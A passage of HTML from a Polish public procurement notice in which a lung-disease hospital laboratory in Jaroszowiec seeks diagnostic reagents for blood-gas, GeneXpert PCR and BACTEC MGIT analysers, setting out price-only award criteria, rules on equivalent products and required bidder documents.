class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa odczynników diagnostycznych do medycznych badań laboratoryjnych do Laboratorium Małopolskiego Szpitala Chorób Płuc i Rehabilitacji im. Edmunda Wojtyły w lokalizacji Jaroszowiec, ul. Kolejowa 1a w asortymencie i ilościach wyszczególnionych w Załączniku nr 1A do SWZ - Formularz asortymentowo-cenowy.<br/>2.	Zamawiający informuje, iż odczynniki których dotyczy przedmiotowe postępowanie służą do wykonywania medycznych badań laboratoryjnych na aparatach/systemach laboratoryjnych będących w posiadaniu Zamawiającego/będących jego własnością.<br/>3.	Przedmiot zamówienia obejmuje sukcesywną sprzedaż oraz dostawę odczynników zgodnie z formularzem cenowym stanowiącym załącznik nr 1A do SWZ. <br/>4.	Szczegółowy opis zamówienia znajduje się w formularzu asortymentowo cenowym – załączniku nr 1A do specyfikacji warunków zamówienia, zwanej dalej SWZ. <br/>5.	Zamówienie zostało podzielone na 3 części. Zamawiający dopuszcza składanie ofert częściowych – gdzie część zamówienia stanowi dane Zadanie wg podziału jak poniżej:<br/><br/>Zadanie nr 1. - Odczynniki do wykonywania badań gazometrycznych w analizatorze OPTI CCA-TS2<br/>Zadanie nr 2. - Odczynniki do wykonywania mikrobiologicznych badań molekularnych w systemie zamkniętym metodą RT-PCR w analizatorze GeneXpert 10C<br/>Zadanie nr 3.- Odczynniki do wykonywania hodowli Mycobacterium na podłożach płynnych w systemie automatycznym BD BACTEC MGIT 320<br/><br/>6.	Przyjęte przez zamawiającego w formularzu asortymentowo-cenowym – Załączniku nr 1A do SWZ planowane ilości produktów są ilościami szacunkowymi. Zamawiający zastrzega prawo zamówienia w okresie obowiązywania umowy mniejszej lub większej ilości produktów w stosunku do ilości przyjętych w formularzu cenowym, stosownie do swoich potrzeb, przy czym zmiany te nie spowodują przekroczenia łącznej wartości umowy. Zamawiający zobowiązuje się do minimalnej realizacji zamówienia na poziomie nie mniejszym niż 80% łącznej wartości umowy.<br/>7.	Ewentualne zamówienie w okresie obowiązywania umowy mniejszej lub większej ilości produktów nie spowoduje zmiany ich cen podanych przez wykonawcę w ofercie, jak również z tego powodu nie będą przysługiwały wykonawcy żadne dodatkowe roszczenia w stosunku do zamawiającego.<br/>8.	Wykonawca zobowiązany jest do realizacji zamówienia z poszanowaniem zasad bezpieczeństwa i higieny pracy.<br/>9.	Odczynniki dostarczane do siedziby Zamawiającego w dostawach sukcesywnych do 7 dni roboczych od dnia złożenia zamówienia. Zamawiający zastrzega, że w przypadkach nagłych tzw. Cito. Wykonawca zobowiązany będzie zrealizować dostawę cząstkową w terminie do 24 godzin, licząc od godziny złożenia zapotrzebowania przez Zamawiającego.<br/>10.	Przedmiot zamówienia winien posiadać dokumenty potwierdzające, że oferowane produkty zakwalifikowane są jako wyroby medyczne w rozumieniu ustawy z dnia 20.05.2010 r. o wyrobach medycznych z późn. zm.<br/>11.	Przedmiot zamówienia winien posiadać odpowiedni certyfikat CE, deklarację zgodności, certyfikat z badania, który należy dostarczyć wraz z dostawą zamawianych odczynników. <br/>12.	Z ofertą prosimy o przedstawienie ostatnich aktualnych certyfikatów badania dla odczynników.<br/>13.	Dostarczenie karty charakterystyki odczynnika i Instrukcji używania odczynników w języku polskim wraz z dostawą lub wskazanie adresu internetowego ( linku), który umożliwi wgląd i pobranie aktualnej instrukcji.<br/>14.	Kody CPV:<br/>Główny kod: <br/>33696500-0 – Odczynniki laboratoryjne<br/>Zadanie 1. 33696200-7 – Odczynniki do badania krwi<br/>Zadanie 2. 33696500-0<br/>Zadanie 3. 33696500-0 <br/>15.	Równoważność<br/>	Zamawiający dopuszcza składanie ofert równoważnych. <br/>W przypadku zaoferowania przez Wykonawcę produktu równoważnego, wymagane jest uzupełnienie kolumny– „Numer katalogowy oraz nazwa Wykonawcy/Producenta”. <br/>Zamawiający dopuszcza możliwość zaoferowania produktów równoważnych jakościowo, fizykochemicznie, eksploatacyjnie i technicznie. Poniżej opisana definicja równoważności odnosi się do wszystkich pakietów.<br/>Użyte w zadaniach nazwy własne producentów/dostawców zostały umieszczone ze względów technologicznych, z uwagi na konieczność zachowania norm, parametrów i standardów, jakimi charakteryzują się posiadane przez zamawiającego urządzenia bądź realizowane badania.<br/>Przez podanie nazw własnych produktów(numerów katalogowych), będących przedmiotem zamówienia, zamawiający określa minimalne parametry, cechy użytkowe oraz jakościowe, jakim powinny odpowiadać produkty równoważne, aby spełniały stawiane wymagania.<br/>Zaproponowane przez Wykonawców w ofercie produkty równoważne muszą posiadać minimalne parametry odpowiadające produktom wyszczególnionym w pakietach a także posiadać cechy jakościowe i cechy użytkowe nie gorsze niż produkty wymienione przez Zamawiającego w wyspecyfikowanych pakietach.<br/>Wykonawca, który w ofercie powoła się na zastosowanie produktów równoważnych opisywanych w SWZ, jest zobowiązany wykazać, że oferowane produkty produkowane są w takim procesie technologicznym oraz posiadają nie gorsze właściwości, które zapewniają takie same warunki realizacji prowadzonych badań co produkty w opisie SWZ. Wymóg ten podyktowany jest koniecznością uniknięcia powtórzenia wykonywanych badań oraz utraty uzyskanych wyników. W przypadku zaoferowania produktu równoważnego Wykonawca dołączy do oferty podpisany dowód równoważności (certyfikat jakości, karta charakterystyki, metodykę, instrukcję użycia odczynnika w aparacie/systemie będącym w posiadaniu Zamawiającego, atest lub inny dokument z którego wynika równoważność).<br/><br/>15.OFERTY CZĘŚCIOWE<br/>Zamówienie zostało podzielone na 3 części. Zamawiający dopuszcza składanie ofert częściowych – gdzie część zamówienia stanowi dane Zadanie wg podziału jak poniżej:<br/>Zadanie nr 1. - Odczynniki do wykonywania badań gazometrycznych w analizatorze OPTI CCA-TS2<br/>Zadanie nr 2. - Odczynniki do wykonywania mikrobiologicznych badań molekularnych w systemie zamkniętym metodą RT-PCR w analizatorze GeneXpert 10C<br/>Zadanie nr 3.- Odczynniki do wykonywania hodowli Mycobacterium na podłożach płynnych w systemie automatycznym BD BACTEC MGIT 320 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33696500-0 - Odczynniki laboratoryjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający do etapu oceny ofert pod względem ustalonych w ust. 2 kryteriów zakwalifikuje oferty spełniające następujące wymagania:<br/>a)	oferta została złożona w określonym przez Zamawiającego terminie,<br/>b)	złożone przez Wykonawcę dokumenty (oświadczenia) potwierdzają spełnianie przez niego warunków udziału w Postępowaniu określone w Specyfikacji,<br/>c)	złożone oświadczenia i wymagane dokumenty są aktualne, zostały złożone w odpowiedniej formie i są podpisane przez osoby uprawnione do reprezentowania Wykonawcy,<br/>d)	oferta nie podlega odrzuceniu. <br/><br/>2.	Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobem ich oceny.<br/>Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu. <br/>Zamawiający będzie oceniał oferty według następujących kryteriów: <br/> <br/>Nr Nazwa kryterium Waga <br/>1. Cena (Koszt) 100 pkt<br/>3.	Oferta wypełniająca w najwyższym stopniu wymagania określone w ww. kryteriach otrzyma maksymalną liczbę punktów. Pozostałym wykonawcom, wypełniającym wymagania kryterialne przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie traktowany jako wartość punktowa oferty.<br/>4.	Oferty Wykonawców niewykluczonych oraz oferty nieodrzucone będą oceniane w skali 100-punktowej wg wzoru:<br/>Kryterium – Cena (C) obliczane wg wzoru: <br/> Najniższa oferowana cena brutto<br/>------------------------------------------------ x 100 x 100 %<br/> Cena brutto badanej oferty <br/><br/>5.	Oferta może uzyskać maksymalnie 100 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa odczynników diagnostycznych do medycznych badań laboratoryjnych do Laboratorium Małopolskiego Szpitala Chorób Płuc i Rehabilitacji im. Edmunda Wojtyły w lokalizacji Jaroszowiec, ul. Kolejowa 1a w asortymencie i ilościach wyszczególnionych w Załączniku nr 1A do SWZ - Formularz asortymentowo-cenowy.<br/>2.	Zamawiający informuje, iż odczynniki których dotyczy przedmiotowe postępowanie służą do wykonywania medycznych badań laboratoryjnych na aparatach/systemach laboratoryjnych będących w posiadaniu Zamawiającego/będących jego własnością.<br/>3.	Przedmiot zamówienia obejmuje sukcesywną sprzedaż oraz dostawę odczynników zgodnie z formularzem cenowym stanowiącym załącznik nr 1A do SWZ. <br/>4.	Szczegółowy opis zamówienia znajduje się w formularzu asortymentowo cenowym – załączniku nr 1A do specyfikacji warunków zamówienia, zwanej dalej SWZ. <br/>5.	Zamówienie zostało podzielone na 3 części. Zamawiający dopuszcza składanie ofert częściowych – gdzie część zamówienia stanowi dane Zadanie wg podziału jak poniżej:<br/><br/>Zadanie nr 1. - Odczynniki do wykonywania badań gazometrycznych w analizatorze OPTI CCA-TS2<br/>Zadanie nr 2. - Odczynniki do wykonywania mikrobiologicznych badań molekularnych w systemie zamkniętym metodą RT-PCR w analizatorze GeneXpert 10C<br/>Zadanie nr 3.- Odczynniki do wykonywania hodowli Mycobacterium na podłożach płynnych w systemie automatycznym BD BACTEC MGIT 320<br/><br/>6.	Przyjęte przez zamawiającego w formularzu asortymentowo-cenowym – Załączniku nr 1A do SWZ planowane ilości produktów są ilościami szacunkowymi. Zamawiający zastrzega prawo zamówienia w okresie obowiązywania umowy mniejszej lub większej ilości produktów w stosunku do ilości przyjętych w formularzu cenowym, stosownie do swoich potrzeb, przy czym zmiany te nie spowodują przekroczenia łącznej wartości umowy. Zamawiający zobowiązuje się do minimalnej realizacji zamówienia na poziomie nie mniejszym niż 80% łącznej wartości umowy.<br/>7.	Ewentualne zamówienie w okresie obowiązywania umowy mniejszej lub większej ilości produktów nie spowoduje zmiany ich cen podanych przez wykonawcę w ofercie, jak również z tego powodu nie będą przysługiwały wykonawcy żadne dodatkowe roszczenia w stosunku do zamawiającego.<br/>8.	Wykonawca zobowiązany jest do realizacji zamówienia z poszanowaniem zasad bezpieczeństwa i higieny pracy.<br/>9.	Odczynniki dostarczane do siedziby Zamawiającego w dostawach sukcesywnych do 7 dni roboczych od dnia złożenia zamówienia. Zamawiający zastrzega, że w przypadkach nagłych tzw. Cito. Wykonawca zobowiązany będzie zrealizować dostawę cząstkową w terminie do 24 godzin, licząc od godziny złożenia zapotrzebowania przez Zamawiającego.<br/>10.	Przedmiot zamówienia winien posiadać dokumenty potwierdzające, że oferowane produkty zakwalifikowane są jako wyroby medyczne w rozumieniu ustawy z dnia 20.05.2010 r. o wyrobach medycznych z późn. zm.<br/>11.	Przedmiot zamówienia winien posiadać odpowiedni certyfikat CE, deklarację zgodności, certyfikat z badania, który należy dostarczyć wraz z dostawą zamawianych odczynników. <br/>12.	Z ofertą prosimy o przedstawienie ostatnich aktualnych certyfikatów badania dla odczynników.<br/>13.	Dostarczenie karty charakterystyki odczynnika i Instrukcji używania odczynników w języku polskim wraz z dostawą lub wskazanie adresu internetowego ( linku), który umożliwi wgląd i pobranie aktualnej instrukcji.<br/>14.	Kody CPV:<br/>Główny kod: <br/>33696500-0 – Odczynniki laboratoryjne<br/>Zadanie 1. 33696200-7 – Odczynniki do badania krwi<br/>Zadanie 2. 33696500-0<br/>Zadanie 3. 33696500-0 <br/>15.	Równoważność<br/>	Zamawiający dopuszcza składanie ofert równoważnych. <br/>W przypadku zaoferowania przez Wykonawcę produktu równoważnego, wymagane jest uzupełnienie kolumny– „Numer katalogowy oraz nazwa Wykonawcy/Producenta”. <br/>Zamawiający dopuszcza możliwość zaoferowania produktów równoważnych jakościowo, fizykochemicznie, eksploatacyjnie i technicznie. Poniżej opisana definicja równoważności odnosi się do wszystkich pakietów.<br/>Użyte w zadaniach nazwy własne producentów/dostawców zostały umieszczone ze względów technologicznych, z uwagi na konieczność zachowania norm, parametrów i standardów, jakimi charakteryzują się posiadane przez zamawiającego urządzenia bądź realizowane badania.<br/>Przez podanie nazw własnych produktów(numerów katalogowych), będących przedmiotem zamówienia, zamawiający określa minimalne parametry, cechy użytkowe oraz jakościowe, jakim powinny odpowiadać produkty równoważne, aby spełniały stawiane wymagania.<br/>Zaproponowane przez Wykonawców w ofercie produkty równoważne muszą posiadać minimalne parametry odpowiadające produktom wyszczególnionym w pakietach a także posiadać cechy jakościowe i cechy użytkowe nie gorsze niż produkty wymienione przez Zamawiającego w wyspecyfikowanych pakietach.<br/>Wykonawca, który w ofercie powoła się na zastosowanie produktów równoważnych opisywanych w SWZ, jest zobowiązany wykazać, że oferowane produkty produkowane są w takim procesie technologicznym oraz posiadają nie gorsze właściwości, które zapewniają takie same warunki realizacji prowadzonych badań co produkty w opisie SWZ. Wymóg ten podyktowany jest koniecznością uniknięcia powtórzenia wykonywanych badań oraz utraty uzyskanych wyników. W przypadku zaoferowania produktu równoważnego Wykonawca dołączy do oferty podpisany dowód równoważności (certyfikat jakości, karta charakterystyki, metodykę, instrukcję użycia odczynnika w aparacie/systemie będącym w posiadaniu Zamawiającego, atest lub inny dokument z którego wynika równoważność).<br/><br/>15.OFERTY CZĘŚCIOWE<br/>Zamówienie zostało podzielone na 3 części. Zamawiający dopuszcza składanie ofert częściowych – gdzie część zamówienia stanowi dane Zadanie wg podziału jak poniżej:<br/>Zadanie nr 1. - Odczynniki do wykonywania badań gazometrycznych w analizatorze OPTI CCA-TS2<br/>Zadanie nr 2. - Odczynniki do wykonywania mikrobiologicznych badań molekularnych w systemie zamkniętym metodą RT-PCR w analizatorze GeneXpert 10C<br/>Zadanie nr 3.- Odczynniki do wykonywania hodowli Mycobacterium na podłożach płynnych w systemie automatycznym BD BACTEC MGIT 320 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33696500-0 - Odczynniki laboratoryjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający do etapu oceny ofert pod względem ustalonych w ust. 2 kryteriów zakwalifikuje oferty spełniające następujące wymagania:<br/>a)	oferta została złożona w określonym przez Zamawiającego terminie,<br/>b)	złożone przez Wykonawcę dokumenty (oświadczenia) potwierdzają spełnianie przez niego warunków udziału w Postępowaniu określone w Specyfikacji,<br/>c)	złożone oświadczenia i wymagane dokumenty są aktualne, zostały złożone w odpowiedniej formie i są podpisane przez osoby uprawnione do reprezentowania Wykonawcy,<br/>d)	oferta nie podlega odrzuceniu. <br/><br/>2.	Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobem ich oceny.<br/>Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu. <br/>Zamawiający będzie oceniał oferty według następujących kryteriów: <br/> <br/>Nr Nazwa kryterium Waga <br/>1. Cena (Koszt) 100 pkt<br/>3.	Oferta wypełniająca w najwyższym stopniu wymagania określone w ww. kryteriach otrzyma maksymalną liczbę punktów. Pozostałym wykonawcom, wypełniającym wymagania kryterialne przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie traktowany jako wartość punktowa oferty.<br/>4.	Oferty Wykonawców niewykluczonych oraz oferty nieodrzucone będą oceniane w skali 100-punktowej wg wzoru:<br/>Kryterium – Cena (C) obliczane wg wzoru: <br/> Najniższa oferowana cena brutto<br/>------------------------------------------------ x 100 x 100 %<br/> Cena brutto badanej oferty <br/><br/>5.	Oferta może uzyskać maksymalnie 100 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają warunki określone w art. 273 ust.1 ustawy Pzp , tj.:<br/>1)	nie podlegają wykluczeniu<br/>2)	spełniają warunki udziału w postępowaniu, dotyczące:<br/>a)	zdolności do występowania w obrocie gospodarczym<br/>- Zamawiający nie ustala szczegółowego warunku udziału w Postępowaniu. <br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>- Zamawiający nie ustala szczegółowego warunku udziału w Postępowaniu. <br/>c)	sytuacji ekonomicznej lub finansowej<br/>- Zamawiający nie ustala szczegółowego warunku udziału w Postępowaniu. <br/>d)	zdolności technicznej lub zawodowej <br/>- Zamawiający nie ustala szczegółowego warunku udziału w Postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.1.	Do składanej oferty Wykonawca: dołączy oświadczenie o niepodleganiu wykluczeniu w zakresie wskazanym przez Zamawiającego. Wzór oświadczenia stanowi załącznik nr 2 do SWZ. <br/>•	Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia, na dzień składania ofert, stanowi dowód tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>1.2.	Oświadczenie o niepodleganiu wykluczeniu (składane na podstawie art. 7 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego) – oświadczenie Wykonawcy stanowi wzór załącznik nr 2 do SWZ.<br/>1.4.	Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych tj. ; określonych w tabeli 1</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.1.	Do składanej oferty Wykonawca: dołączy oświadczenie o niepodleganiu wykluczeniu w zakresie wskazanym przez Zamawiającego. <br/>Wzór oświadczenia stanowi załącznik nr 2 do SWZ. <br/>•	Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia, na dzień składania ofert, stanowi dowód tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>1.2.	Oświadczenie o niepodleganiu wykluczeniu (składane na podstawie art. 7 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego) – oświadczenie Wykonawcy stanowi wzór załącznik nr 2 do SWZ<br/>•	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>•	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego Wykonawca mający siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej składa oświadczenie na załączniku nr 2 do SWZ.<br/>1.3.	Wykonawca nie będzie obowiązany do złożenia podmiotowych środków dowodowych, potwierdzających spełnianie warunków udziału w postępowaniu lub brak podstaw wykluczenia, jeżeli Zamawiający posiada oświadczenia a wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność lub może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2014 r. poz. 1114 oraz z 2016r. poz. 352) lub podmiotowych środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp.<br/>•	W przypadku wskazania przez Wykonawcę dostępności oświadczeń lub dokumentów, w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobierze samodzielnie z tych baz danych wskazane przez Wykonawcę oświadczenia lub dokumenty.<br/>•	W przypadku wskazania przez Wykonawcę oświadczeń lub dokumentów na potwierdzenie braku podstaw wykluczenia lub spełniania warunków udziału w postępowaniu, w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający będzie wymagał od Wykonawcy przedstawienia tłumaczenia na język polski wskazanych przez Wykonawcę i pobranych samodzielnie przez Zamawiającego dokumentów.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający żąda złożenia przedmiotowych środków dowodowych, a wykonawca składa je wraz z ofertą. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1) Katalogi i/lub ulotki informacyjne producenta/dostawcy opisujące metodyki badań oraz dołączy Karty charakterystyki produktu dotyczące oferowanego wyrobu w języku polskim <br/>2)	aktualne certyfikaty badania dla odczynników.<br/>3) w odniesieniu do produktów zakwalifikowanych do wyrobów medycznych: <br/> - właściwe dokumenty potwierdzające, iż oferowany przedmiot zamówienia jest zgodny z ustawą z dnia 7 kwietnia 2022 roku o wyrobach medycznych (Dz. U. z 2022 r. poz. 974 z późn. zm.) oraz dopuszczony do obrotu i stosowania w służbie zdrowia(certyfikaty CE, deklaracje zgodności) zgodnie z klasą wyrobu medycznego lub stosowne oświadczenie , iż do danego produktu nie stosuje się przepisów ww. ustawy wraz załączeniem innych dokumentów potwierdzających że produkt jest dopuszczony do obrotu i stosowania na ternie Unii Europejskiej wynikających z odrębnych przepisów,<br/>- potwierdzenie, że oferowany wyrób medyczny został zgłoszony/ wpisany do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu lub dokonano powiadomienia o wyrobie w trybie. art. 58 ustawy o wyrobach medycznych -nazwa wyrobu zgłoszona /wpisana do rejestru winna odpowiadać nazwie handlowej /katalogowej oferowanego wyrobu. <br/>4)	dokumenty i oświadczenia potwierdzające spełnianie przez Wykonawcę warunków udziału w Postępowaniu i brak podstaw do wykluczenia (wymienione w Rozdziale IV i Rozdziale VIII ust.1 pkt. 1.1 i ust 1.2. oraz dokumenty wskazane w rozdz. IX i X Specyfikacji (jeśli dotyczy),<br/>5)	w przypadku, gdy umocowanie osoby podpisującej ofertę nie wynika z właściwego rejestru, do oferty należy dołączyć pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo reprezentowania w tym postępowaniu i zawarcia umowy, podpisane przez osoby do tego umocowane/ uprawnione do reprezentowania Wykonawcy. Wszelkie pełnomocnictwa winny być załączone do oferty w formie oryginału lub urzędowo poświadczonego odpisu pełnomocnictwa (notarialnie – art. 97 ust. 2 ustawy z 14 lutego 1991 r. – Prawo o notariacie (tekst jednolity Dz.U. 2020 poz. 1192 z późniejszymi zmianami). <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Ofertę stanowią:<br/>1)	formularz ofertowy – interaktywny udostępniony przez Zamawiającego na platformie <br/>e-Zamówienia<br/>2)	Formularz asortymentowo-ilościowy – Załącznik nr 1A w zakresie Zadań nr 1-3<br/>UWAGA! W przypadku niedołączenia do Oferty Załącznika nr 1A w zakresie Zadań nr 1-3 , Zamawiający odrzuci ofertę Wykonawcy,<br/>3)	Katalogi i/lub ulotki informacyjne producenta/dostawcy opisujące metodyki badań oraz dołączy Karty charakterystyki produktu dotyczące oferowanego wyrobu w języku polskim <br/>4)	aktualne certyfikaty badania dla odczynników.<br/>5) w odniesieniu do produktów zakwalifikowanych do wyrobów medycznych: <br/> - właściwe dokumenty potwierdzające, iż oferowany przedmiot zamówienia jest zgodny z ustawą z dnia 7 kwietnia 2022 roku o wyrobach medycznych (Dz. U. z 2022 r. poz. 974 z późn. zm.) oraz dopuszczony do obrotu i stosowania w służbie zdrowia(certyfikaty CE, deklaracje zgodności) zgodnie z klasą wyrobu medycznego lub stosowne oświadczenie , iż do danego produktu nie stosuje się przepisów ww. ustawy wraz załączeniem innych dokumentów potwierdzających że produkt jest dopuszczony do obrotu i stosowania na ternie Unii Europejskiej wynikających z odrębnych przepisów,<br/>- potwierdzenie, że oferowany wyrób medyczny został zgłoszony/ wpisany do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu lub dokonano powiadomienia o wyrobie w trybie. art. 58 ustawy o wyrobach medycznych -nazwa wyrobu zgłoszona /wpisana do rejestru winna odpowiadać nazwie handlowej /katalogowej oferowanego wyrobu. <br/>6)	dokumenty i oświadczenia potwierdzające spełnianie przez Wykonawcę warunków udziału w Postępowaniu i brak podstaw do wykluczenia (wymienione w Rozdziale IV i Rozdziale VIII ust.1 pkt. 1.1 i ust 1.2. oraz dokumenty wskazane w rozdz. IX i X Specyfikacji (jeśli dotyczy),<br/>7)	w przypadku, gdy umocowanie osoby podpisującej ofertę nie wynika z właściwego rejestru, do oferty należy dołączyć pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo reprezentowania w tym postępowaniu i zawarcia umowy, podpisane przez osoby do tego umocowane/ uprawnione do reprezentowania Wykonawcy. Wszelkie pełnomocnictwa winny być załączone do oferty w formie oryginału lub urzędowo poświadczonego odpisu pełnomocnictwa (notarialnie – art. 97 ust. 2 ustawy z 14 lutego 1991 r. – Prawo o notariacie (tekst jednolity Dz.U. 2020 poz. 1192 z późniejszymi zmianami). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania 